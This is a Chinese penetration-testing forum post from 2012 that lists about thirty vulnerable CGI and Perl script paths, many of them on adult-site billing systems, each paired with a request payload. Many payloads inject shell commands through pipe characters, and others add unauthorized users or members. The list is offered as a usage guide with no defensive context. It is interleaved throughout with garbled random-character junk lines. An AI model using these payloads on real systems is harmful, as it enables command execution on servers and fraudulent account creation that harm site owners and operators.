中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
$ _2 b2 d. X; e8 G, i* W
* \- k- b: E. p& L$ h! h
/smspass.pl
6 c& H5 M% p; W. ^ a: \ l; `
username=username&password=password
C: e' G: t+ b2 u7 M
5 G- O8 N' @+ s, a0 f
/index.cgi
. P0 {) u9 g- U$ k2 s
wei=ren&gen=command
# t, V7 A, ^( I" s/ W0 H) _, N
* F* g/ y! \! L: `, {4 S
/passmaster.cgi
; I" v: H! y% ~4 E0 H8 z
Action=Add&Username=Username&Password=Password
7 p2 a$ T6 [3 w" z7 r5 A6 _
5 p1 ]$ X+ B. s! G# h7 G
/accountcreate.cgi
; k0 }7 t$ }7 f" X9 q
username=username&password=password&ref1=|echo;ls|
3 ?4 E8 }4 f0 U4 ?! O
( r# ]# n/ p/ K1 k
/form.cgi
7 [/ ^) B4 B3 B- x$ o! m
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/ g7 o$ ?4 P3 M
6 D3 w, }+ t [
/addusr.pl
8 r; y; X& j* |, ? ]1 b$ U
/cgi-bin/EuroDebit/addusr.pl
4 v& a# @$ v8 O" Z9 _
user=username&pass=Password&confirm=Password
2 A. s: D* M6 S' U) l
7 S- H, | R# |( u; Y% ]
/ccbill-local.asp
) B# j, @1 o1 e! b& { t
post_values=username:password
4 j& y' [- \7 ^2 |& [; F
$ ]$ J- V: Y a
/count.cgi
1 |2 J6 a1 K! g9 r) O
pinfile=|echo;ls -la;exit|
! J6 Z$ F# g: |$ n+ a$ r0 b
* [7 h2 G; n# f3 E9 a
/recon.cgi
) u ]- F, ], I! q
/recon.cgi?search
0 a% A/ w2 O( f7 a7 `
searchoption=1&searchfor=|echo;ls -al;exit|
" U& {0 U8 {5 H6 L0 k0 y
; }# l# ]. k6 M* t& N9 _, @0 C# z
/verotelrum.pl
4 Y+ F' V- \- i% v" w
vercode=username:password:dseegsow:add:amount<&30>
. M& s$ w, h9 @: P0 w1 K
+ i$ i3 [! w! l0 [" u; ~7 w' r7 `- ]
/af.cgi
1 { {% M! D# M
_browser_out=|echo;ls -la;exit;|
/ k! }; h1 P8 u0 M
& S7 e# O; |* S! n* j: g" c5 x
/modify.cgi
q5 }, B" F3 e$ E
username=username&password=password&expire=30
* s# o. O/ d/ ?2 ?' b$ N8 Y
4 {/ f- l+ c0 ^
/openjournal.cgi
1 Z& a+ T8 ^# G1 ^7 b2 w
edit=1&ct=2&go=|echo;ls -al;exit|
! r* r" n1 F1 M2 n5 M) \
3 e7 _9 B9 `' n8 t& \
/gx9passwd.cgi
8 x" K2 M8 Z% H. U4 g
cmd=ADD&user=username&pass=password
' v, n. u0 h9 E$ j' [
& ?/ o0 q0 w* s/ G" Q' i0 p2 Q/ U
/probecontrol.cgi
& ]- W7 Y4 ^! S# `5 I7 H* W6 g- \' j
command=enable&username=username&password=password
8 C b& O$ s1 j- {$ t) v
2 ~, B y, m) H% G1 s6 F- F v9 a! A
/recon.cgi
0 m7 M; ?6 ?& \, {
searchoption=3&searchfor=echo;ls -la;exit
4 R6 D! X* u7 \4 A+ L2 b6 a
6 w" F/ g9 n7 |/ A6 _
/htadd.pl
* r. ~& [0 W3 A. d
configfile=|echo; ls -alt; exit
- L% ^% G6 ^" u( m5 U" r$ c
6 f0 @; j7 Q x+ `, O
/gx9passwd.cgi
. x8 h2 {- Q" O o# M% @% L/ S
cmd=ADD&user=username&pass=password
9 Q5 G" n& q. O' i- |4 I9 B
( R) u* F1 M; v1 M; \! c Z
/ibill*.pl
0 C$ D+ h+ H8 ^3 {2 j' V
reqtype=add&authpwd=authpwd&username=username&password=password
- w, x$ S( L5 f( s
- |( i9 c' ^8 I5 f: W# y
/cpay.cgi
" N; P; B) R) r& }% @' v
command=add_member&username=username(EMAIL)&password=password(DES)
! A: n6 T+ a6 `. T4 _2 }6 Y
$ [ I% r. i; k8 g9 Z+ {
/globill_ut.cgi
^; a) u* ]& w: ]3 j: B% n2 N4 K
do=add&username=username&password=password&wpassword=password
- r7 M4 g2 Z7 ?0 U
7 Y' [3 l+ L- X, ?# y& g) Y5 P+ z
/usercontrol.cgi
$ `2 x3 \- f: q4 J9 V! v
command=enable&username=USER&password=PASS
# H0 l. G/ C0 g5 ?- S# w! _7 f
6 q8 Y! k& y3 F# S3 V2 g0 Z$ B
/globoSALErum.cgi
7 d f% G! m; V
action=ADD&seccode=seccode&login=username&password=password
9 ~7 @, A# ?8 h6 |1 @
+ f* d' b$ @* @) A+ L3 \7 @9 `$ n
/addusr.pl
* X; a, d# c1 ]8 l) o6 W" E9 G: g* W7 u
user=USER&pass=PASS&confirm=PASS
- T- _$ J1 i" W) _9 L! l
9 I" T3 i( ~2 `9 U% A1 z
/pincount.cgi
1 }7 y- A7 W) K4 u: c3 U
/cgi-bin/mastergate/pincount.cgi
) u4 x6 c' F, i4 l6 X; J1 A+ [
pinfile=|echo;pwd;exit|
3 l _7 G8 ]. _/ q; t
4 f; e+ u3 ?3 g& I; y0 P9 y
/accountcreate.cgi
0 z% h. H2 K3 P. f
/cgi-bin/gateway/accountcreate.cgi
/ Z7 |5 J8 ^$ s( D6 w
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
. v- A3 W0 G% r, c
e8 N! |) H+ D: K
/af.cgi
/ l. e6 z* F, B) O# b
/env.cgi
& d4 V# j7 p( J o c% J6 b; {
ADD+;echo;pwd;exit
% V' ]# q. ?9 m- _9 J, Q/ ?
& r) X- v6 Q* p5 u6 R
/count.cgi
, X0 D7 `$ Z! m2 S! T1 i
pinfile=|echo;pwd;exit|
, X+ j4 ~/ A5 i$ b( \
0 Y5 l/ i# N& L' |; B4 S. D
/recon.cgi
9 T3 m2 n8 n7 L; Y; T2 S( T' I
searchoption=1&searchfor=|echo;ls%20-al;exit|
7 }6 L) l J4 N/ ?9 h: G9 I( A$ x+ P
% I/ ~) u$ t2 x* q. _/ N: p
/add.cgi
4 ^. H) o9 O) K: X; P$ v
username=username&password=password&expire=30
8 i2 X9 _ t+ Q
5 u" q5 T G8 z! |; d
==============================
1 e, _' A8 L, `1 i5 _( x
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2